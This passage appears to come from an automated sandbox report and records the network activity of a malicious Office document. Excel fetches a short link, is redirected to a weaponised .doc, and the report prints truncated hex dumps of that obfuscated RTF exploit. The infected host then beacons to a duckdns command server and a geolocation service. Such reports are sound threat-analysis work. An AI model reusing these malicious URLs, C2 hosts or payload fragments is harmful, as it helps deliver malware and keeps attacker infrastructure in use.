            May 27, 2024 09:01:00.662857056 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:00.662945986 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:00.692435026 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:00.697442055 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.599324942 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.810877085 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.810962915 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:01.873548985 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.927392006 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:01.933269024 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.983452082 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:01.988548994 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:01.988617897 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:01.993525028 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:02.629143000 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:02.631393909 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:02.636358023 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:02.905298948 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:03.041712999 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:01:03.046622992 CEST8049177178.237.33.50192.168.2.22
            May 27, 2024 09:01:03.046681881 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:01:03.046850920 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:01:03.051688910 CEST8049177178.237.33.50192.168.2.22
            May 27, 2024 09:01:03.118658066 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:03.118855000 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:03.683459044 CEST8049177178.237.33.50192.168.2.22
            May 27, 2024 09:01:03.683548927 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:01:03.690979958 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:03.695980072 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:04.685241938 CEST8049177178.237.33.50192.168.2.22
            May 27, 2024 09:01:04.685427904 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:01:16.864927053 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:16.866408110 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:16.871315002 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:46.952030897 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:01:46.953706026 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:01:46.958879948 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:02:10.959427118 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:11.286469936 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:11.894875050 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:13.096072912 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:15.498785019 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:17.045171976 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:02:17.046413898 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:02:17.051733971 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:02:18.493894100 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:18.493943930 CEST4916980192.168.2.2254.241.153.192
            May 27, 2024 09:02:18.498954058 CEST804916954.241.153.192192.168.2.22
            May 27, 2024 09:02:18.790219069 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:19.398513079 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:20.397111893 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:20.599872112 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:23.002142906 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:27.838205099 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:30.006578922 CEST4917780192.168.2.22178.237.33.50
            May 27, 2024 09:02:37.510152102 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:02:47.340388060 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:02:47.342331886 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:02:47.347204924 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:03:17.194365025 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:03:17.195954084 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:03:17.214530945 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:03:47.279093027 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:03:47.280478001 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:03:47.323256016 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:17.406553030 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:17.642585993 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:17.644179106 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:17.726121902 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:17.890547991 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:17.894196987 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:19.534807920 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:20.735646963 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:21.937051058 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:21.989346027 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:47.473011017 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:04:47.476880074 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:04:47.558059931 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:17.588176966 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:17.595124006 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:17.838529110 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:17.910950899 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:17.975682974 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:47.649139881 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:47.894402981 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:47.908406019 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:47.908762932 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:48.426681995 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:48.426872969 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:49.450740099 CEST1464549176194.187.251.115192.168.2.22
            May 27, 2024 09:05:49.450891018 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:49.496068001 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:50.404620886 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:52.214310884 CEST4917614645192.168.2.22194.187.251.115
            May 27, 2024 09:05:55.818046093 CEST4917614645192.168.2.22194.187.251.115

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 27, 2024 09:00:26.224787951 CEST5456253192.168.2.228.8.8.8
            May 27, 2024 09:00:26.239998102 CEST53545628.8.8.8192.168.2.22
            May 27, 2024 09:00:28.245930910 CEST5291753192.168.2.228.8.8.8
            May 27, 2024 09:00:28.262379885 CEST53529178.8.8.8192.168.2.22
            May 27, 2024 09:00:30.514481068 CEST6275153192.168.2.228.8.8.8
            May 27, 2024 09:00:30.521667004 CEST53627518.8.8.8192.168.2.22
            May 27, 2024 09:00:30.523457050 CEST5789353192.168.2.228.8.8.8
            May 27, 2024 09:00:30.538206100 CEST53578938.8.8.8192.168.2.22
            May 27, 2024 09:00:35.741246939 CEST5482153192.168.2.228.8.8.8
            May 27, 2024 09:00:35.748883963 CEST53548218.8.8.8192.168.2.22
            May 27, 2024 09:00:35.750511885 CEST5471953192.168.2.228.8.8.8
            May 27, 2024 09:00:35.765091896 CEST53547198.8.8.8192.168.2.22
            May 27, 2024 09:00:40.940715075 CEST4988153192.168.2.228.8.8.8
            May 27, 2024 09:00:40.950962067 CEST53498818.8.8.8192.168.2.22
            May 27, 2024 09:00:45.540364027 CEST5499853192.168.2.228.8.8.8
            May 27, 2024 09:00:45.551029921 CEST53549988.8.8.8192.168.2.22
            May 27, 2024 09:00:59.262916088 CEST5278153192.168.2.228.8.8.8
            May 27, 2024 09:01:00.361174107 CEST53527818.8.8.8192.168.2.22
            May 27, 2024 09:01:00.506386995 CEST5278153192.168.2.228.8.8.8
            May 27, 2024 09:01:00.513991117 CEST53527818.8.8.8192.168.2.22
            May 27, 2024 09:01:03.028729916 CEST6392653192.168.2.228.8.8.8
            May 27, 2024 09:01:03.038537979 CEST53639268.8.8.8192.168.2.22

            ICMP Packets

            TimestampSource IPDest IPChecksumCodeType
            May 27, 2024 09:01:00.514166117 CEST192.168.2.228.8.8.8d017(Port unreachable)Destination Unreachable

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            May 27, 2024 09:00:26.224787951 CEST192.168.2.228.8.8.80xe56dStandard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:28.245930910 CEST192.168.2.228.8.8.80x40b1Standard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:30.514481068 CEST192.168.2.228.8.8.80x6c58Standard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:30.523457050 CEST192.168.2.228.8.8.80xac74Standard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:35.741246939 CEST192.168.2.228.8.8.80x1100Standard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:35.750511885 CEST192.168.2.228.8.8.80x2664Standard query (0)z2.inkA (IP address)IN (0x0001)false
            May 27, 2024 09:00:40.940715075 CEST192.168.2.228.8.8.80xaf8fStandard query (0)paste.eeA (IP address)IN (0x0001)false
            May 27, 2024 09:00:45.540364027 CEST192.168.2.228.8.8.80xf321Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
            May 27, 2024 09:00:59.262916088 CEST192.168.2.228.8.8.80x123aStandard query (0)sembe.duckdns.orgA (IP address)IN (0x0001)false
            May 27, 2024 09:01:00.506386995 CEST192.168.2.228.8.8.80x123aStandard query (0)sembe.duckdns.orgA (IP address)IN (0x0001)false
            May 27, 2024 09:01:03.028729916 CEST192.168.2.228.8.8.80xf72eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            May 27, 2024 09:00:26.239998102 CEST8.8.8.8192.168.2.220xe56dNo error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:28.262379885 CEST8.8.8.8192.168.2.220x40b1No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:30.521667004 CEST8.8.8.8192.168.2.220x6c58No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:30.538206100 CEST8.8.8.8192.168.2.220xac74No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:35.748883963 CEST8.8.8.8192.168.2.220x1100No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:35.765091896 CEST8.8.8.8192.168.2.220x2664No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
            May 27, 2024 09:00:40.950962067 CEST8.8.8.8192.168.2.220xaf8fNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
            May 27, 2024 09:00:40.950962067 CEST8.8.8.8192.168.2.220xaf8fNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
            May 27, 2024 09:00:45.551029921 CEST8.8.8.8192.168.2.220xf321No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
            May 27, 2024 09:00:45.551029921 CEST8.8.8.8192.168.2.220xf321No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
            May 27, 2024 09:01:00.361174107 CEST8.8.8.8192.168.2.220x123aNo error (0)sembe.duckdns.org194.187.251.115A (IP address)IN (0x0001)false
            May 27, 2024 09:01:00.513991117 CEST8.8.8.8192.168.2.220x123aNo error (0)sembe.duckdns.org194.187.251.115A (IP address)IN (0x0001)false
            May 27, 2024 09:01:03.038537979 CEST8.8.8.8192.168.2.220xf72eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • paste.ee
            • uploaddeimagens.com.br
            • z2.ink
            • 198.46.178.154
            • geoplugin.net

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.224916154.241.153.192801648C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:26.250842094 CEST317OUTGET /nLNG HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: z2.ink
            Connection: Keep-Alive
            May 27, 2024 09:00:26.838306904 CEST605INHTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:14 GMT
            Content-Length: 89
            Content-Encoding: gzip
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 0b c9 c8 2c 56 08 48 4c 4f 55 f0 48 2c 4b 55 f0 cd 2f 4b 4d b1 d1 87 c8 d9 e8 83 55 72 d9 24 e5 a7 54 82 f4 19 e2 50 0e 94 e0 b2 d1 87 aa d2 07 db 02 00 30 39 f0 91 6c 00 00 00
            Data Ascii: (HML),I,VHLOUH,KU/KMUr$TP09l


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2249162198.46.178.154801648C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:26.850008965 CEST491OUTGET /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:27.382081985 CEST1236INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:27 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword
            Data Raw: 7b 5c 72 74 0d 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 78 6d 6c 74 61 67 74 79 70 65 37 37 37 33 38 34 35 37 34 20 5c 5b 7d 0d 7b 5c 37 35 39 37 31 35 37 33 31 30 29 32 2d 5e 29 a7 3f 3b 60 2b 39 5b 26 25 3e 2a 25 b5 33 3c 3f 3e 27 26 2d 3f 3e 3c 5d 3f 3a 39 3c 3f 24 25 3e 2b 3e 26 a7 2a 2f 3f 37 3f a7 40 3e 5f 5e 5f 3b 5e 39 7e 40 2a 21 3a 3f 38 27 2c 29 b0 7c 3b 32 24 5d 28 25 29 34 27 35 a7 23 2d 25 5d 5b b5 b0 3f 25 b5 2e 3f b5 24 38 60 3f 30 34 2a 2d 25 3f 38 36 29 21 35 3f 2a b5 26 2e 39 25 25 35 32 3f 39 3f 5d b0 27 3f 29 3f 28 23 5b 3f 38 2c 2c 36 5f 26 b0 31 2d 26 33 7e 3f 21 5e 37 a7 25 27 3f 5f 3a 40 3c b5 36 b0 29 23 b0 5f 23 37 5f 40 3b a7 2a 3d 2f 36 21 26 3c 23 29 b0 33 2a 2a 3d 3b 23 2e 3c 60 37 2e b5 5e 2f 28 2a 2a 33 31 34 30 25 27 b5 25 24 2e 3b 2f 39 2f 2d 60 3f 27 35 5e 24 3c 33 30 26 5b 3f 29 26 28 7e 34 2e 2b 2a 32 29 3f 3e 60 3c 24 3e 23 29 5e 28 33 3f 3f 3d 3f 24 3e 5e 25 27 26 3a 3f 3a 5b 32 7c 5b 3c 60 3f 25 3f 33 37 35 23 34 3f 5e 38 35 3a 30 35 36 36 2d 2d 5b 3a 39 2a 5e [TRUNCATED]
            Data Ascii: {\rt{\*\xmltagtype777384574 \[}{\7597157310)2-^)?;`+9[&%>*%3<?>'&-?><]?:9<?$%>+>&*/?7?@>_^_;^9~@*!:?8',)|;2$](%)4'5#-%][?%.?$8`?04*-%?86)!5?*&.9%%52?9?]'?)?(#[?8,,6_&1-&3~?!^7%'?_:@<6)#_#7_@;*=/6!&<#)3**=;#.<`7.^/(**3140%'%$.;/9/-`?'5^$<30&[?)&(~4.+*2)?>`<$>#)^(3??=?$>^%'&:?:[2|[<`?%?375#4?^85:0566--[:9*^-|<<,/9>,^;]!$'?]^#3>,0=81?5%?=?>#=(;++&4?1?]7>(,^337*6[3])~4?['&@%?|$#:)^?='~@*|?/*%0:9>&@?#!|_^3?>3.4?[]7%~=*0?~?5|#|>2*:0~%[!?*%?*?]8<9>*:=%-*>,<_&/+&!#?:+~''>??$,?|??0?*/@'!8?+?^483[-:#13]=)?#100=_<?6&*%@<5@^)%3@<?*%-]?)!3#%^|_8[/);6+?7*|?$$|2?(1^6-!%://](7`8<<98&*(>*3+~^1!%-2'/~38?9:?[&-3#]-33[9?&`??(<?&(:-@@5,?06*<??`?^+7!3@?^%|2=<=0@]<!?320?-!?_[^=`[39*?&2`6(5$/^_=8*/:#0-@&<<?_+[[:=[6]3(;>??2?7*(8|=3&?01?$!>(>?/)*8?_&7?/_(;~',>?<8*_(+%!2_??9^|=5?@?9%(5;~_'[?7$5%?:/^+[-?%,3|_?!4)-8^~76$!+57%.[+:4*_?/(=`4>27]!7+8(]85%/%+15
            May 27, 2024 09:00:27.382113934 CEST1236INData Raw: 39 5f 3d 31 b0 39 2c 3f 32 5e 31 29 40 38 2e 3f 7c 3f 5b 38 29 33 39 39 7e 30 29 37 3a 7c 5d 2d 5b 3e 3f 33 21 31 25 30 36 40 3e 2a 30 5f 30 2d 2e b5 3e 40 3f 5d 26 24 24 34 3f 5d 37 3d 25 3d 5b 3f 5b 24 7c 2a 7c 23 3e 3d 30 21 b5 3f 7c 25 25 31
            Data Ascii: 9_=19,?2^1)@8.?|?[8)399~0)7:|]-[>?3!1%06@>*0_0-.>@?]&$$4?]7=%=[?[$|*|#>=0!?|%%16)[**(?-&|&['?09,#[#^(*2)2?5;&?_3%??'3:/$[3(3&;>%~3</81/?18#_^%(#7<>(%4>$~80&`71;+(?,&?29~]~4_|=2(?.25;7+^](^/9?3[&$/'?2|?7$?&%$7%434%#;0!-*:(?^&8`(1?&*
            May 27, 2024 09:00:27.382131100 CEST1236INData Raw: 7e 3f 3f 7e 5e 2b 2c 36 25 5f 30 3b 32 34 2a 2b 3f 3f 3f 3f 29 b5 33 2b 21 2a 29 3e b0 23 32 31 26 30 2f 29 60 3e 7e 23 b5 38 2f 3b 7e 3f 5b 23 40 2c 3f 31 23 27 3c 38 21 23 21 3f 3f 5e 3f 60 26 b5 39 40 5b 2c 5d 31 b0 28 5b 31 25 b0 21 30 3c 25
            Data Ascii: ~??~^+,6%_0;24*+????)3+!*)>#21&0/)`>~#8/;~?[#@,?1#'<8!#!??^?`&9@[,]1([1%!0<%(:307.%$?|<,=^8.[:(?98??%&<2>|4?//4@39,>%!0&%^)=2?6[-^?[|~&+,4-^?|+8?$],%2#?.0^/$%@?%$&<,,>3%73:2?49:*_?]`;&?/,0>,!~-:$(;5766%;#/^?,?'5$?))'@-443=2*$/
            May 27, 2024 09:00:27.382148027 CEST1236INData Raw: 2d 25 5f 7c 3e 2d b0 30 3f 29 3a 3a 60 3b 31 3d 30 28 5d 27 23 28 3f 26 2b 3b 3f 3f a7 3b 7c 3f 34 3d 30 3c 32 5f 3d 2a 33 3d 3c 31 3f 2c 30 27 3c 7c 3a 7e 38 b5 32 2a 21 25 b0 25 3b 5e 3c 24 5e 40 a7 b5 38 3d 27 5b 2a 5f 31 5d 2f 28 a7 2b 23 3b
            Data Ascii: -%_|>-0?)::`;1=0(]'#(?&+;??;|?4=0<2_=*3=<1?,0'<|:~82*!%%;^<$^@8='[*_1]/(+#;(?%*?*9!@%`]%&<?/8?._<727$?%`_4[-&3!-+/%+>?029_6&%)<~8,3??)5#/42`4[=#%'7<=4?(!?0?#|<?|&?5.#2?%*>372??1@6.7:`*)3&|@(;#;,%7;&9??#?89(#<|?8_*(%~_8?7:156;3&^*
            May 27, 2024 09:00:27.382164001 CEST896INData Raw: 30 33 5e 40 60 5e 31 33 2c 3a 24 28 5b 3d 28 3c 3a 25 36 26 40 3e b0 5f a7 b0 23 2b 3d 26 2c 29 b5 40 3c 33 21 5f 40 30 36 39 2c 23 5e 5e 3c 7c 7c 40 23 7e 38 3f 31 24 3f 37 27 31 3e 34 3f 2a 2b 28 29 5e 37 7e 33 38 27 5b 60 3d 2e 3f 36 3f 40 28
            Data Ascii: 03^@`^13,:$([=(<:%6&@>_#+=&,)@<3!_@069,#^^<||@#~8?1$?7'1>4?*+()^7~38'[`=.?6?@(+3/;=:/59|+31(^_.~?5~/8?~(:(^#',|?~(=~'@?+^%/),:&.69<#$&(2~)#%2?|%7=%6^-6?@432?9;>?<7@]?9<*??,,5-;?0?=;7/#'?;@/#,+].;94?`1%*=~?-?;306'+?=&??-.6$%9`5./*?>%6
            May 27, 2024 09:00:27.382183075 CEST1236INData Raw: 60 36 3f 3f 32 5f 32 28 3b 3a 2c 5d 40 29 37 34 5b 3d 5d 23 3c b5 3f 60 b0 2d 32 5e b5 5e 3c 36 30 a7 38 2f 31 21 3c 3c 21 32 2a 31 21 2a 3a 5b b5 2b 27 2a 7c 35 5e 30 2c 38 29 b5 3b 27 38 21 3d 36 40 2b 21 21 30 2b 5e a7 38 39 28 7c 60 2d 23 3f
            Data Ascii: `6??2_2(;:,]@)74[=]#<?`-2^^<608/1!<<!2*1!*:[+'*|5^0,8);'8!=6@+!!0+^89(|`-#?$*^:5?-6,,9[*'+[7`.578+^2[%1)<@2%-2[[?76%?9-.>:=~-^,7>=8],$/?'')28(<?][?;%~5`1/^-~3836=^1%%!+@+%645:@=9^7!,)=~-9~3010?[?6[%*85?%'@*?=4->41@;+5`^`+*2$^7%_7?
            May 27, 2024 09:00:27.382205009 CEST1236INData Raw: 5f 2a 37 3f 26 2b 2f 25 2d 2d 28 36 2e 27 b0 29 3f 34 3e 31 30 3f b5 33 3a 2d 33 35 23 37 b0 3f b5 25 25 39 5d 7c b5 3f a7 24 25 2c 2f 5d 60 33 28 3d 3e 2f b0 60 2a 3b 39 2f 21 30 2e 24 27 26 35 7c 3b 24 31 3f 3f 39 40 27 21 60 60 3b 2e 3a 3e 25
            Data Ascii: _*7?&+/%--(6.')?4>10?3:-35#7?%%9]|?$%,/]`3(=>/`*;9/!0.$'&5|;$1??9@'!``;.:>%@/>8$,~,?9~279?#`;)\object50433752\objemb77685150\objw4931\objh6386{\~\objupdate851791851791\*\objdata588264{\*\fname81357892 \bin0000000\245226975699247176}
            May 27, 2024 09:00:27.382222891 CEST1236INData Raw: 0a 65 32 65 33 0a 0a 0d 0d 0d 0a 0d 0a 33 20 20 09 09 09 09 20 20 09 09 09 20 09 09 09 20 20 09 20 09 09 20 20 30 30 30 30 09 09 20 20 20 20 20 09 09 09 20 09 09 20 20 20 09 09 20 09 09 20 20 30 09 20 20 09 20 20 20 09 09 09 20 09 09 20 20 20 09
            Data Ascii: e2e33 0000 0 0000 0 0000 00 00 ea
            May 27, 2024 09:00:27.382240057 CEST1236INData Raw: 20 09 09 09 09 09 09 20 09 20 09 20 09 20 20 36 09 20 20 20 09 09 09 09 09 20 09 09 09 20 09 09 20 09 09 20 09 20 20 66 64 0d 0d 0a 0d 0a 0a 0d 0a 39 0d 0d 0d 0a 0a 0a 0d 0a 61 34 34 0d 0a 0d 0a 0a 0a 0d 0a 30 0d 0a 0a 0a 0a 0a 0d 0a 30 63 20 20
            Data Ascii: 6 fd9a4400c d c7 b0514f18b f a79
            May 27, 2024 09:00:27.382268906 CEST1236INData Raw: 20 20 20 20 64 30 30 0d 0d 0a 0d 0a 0d 0a 0a 30 0a 0a 0a 0d 0a 0a 0d 0a 30 35 66 35 09 20 09 09 09 09 09 09 09 20 20 20 09 09 20 20 09 20 09 20 20 20 20 66 09 09 20 09 09 09 20 09 09 20 20 20 09 09 20 20 09 20 09 20 20 20 20 35 65 39 0a 0a 0d 0a
            Data Ascii: d00005f5 f 5e9deb4c e9a50000 00e9 a b0
            May 27, 2024 09:00:27.387614965 CEST1236INData Raw: 20 09 20 20 20 09 20 20 61 65 0a 0a 0d 0a 0a 0d 0a 0a 62 33 34 0a 0a 0d 0a 0a 0d 0a 0a 65 62 62 35 20 09 09 20 09 20 20 09 20 20 20 09 09 20 09 20 09 20 20 20 09 20 20 65 62 35 31 65 62 20 09 09 20 09 20 20 09 20 20 20 09 09 20 09 20 09 20 20 20
            Data Ascii: aeb34ebb5 eb51eb daeb deeb65eb31e b 61eba75 9e968ff


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.224916354.241.153.192801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:28.274204016 CEST128OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:28.872950077 CEST1236INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:28 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
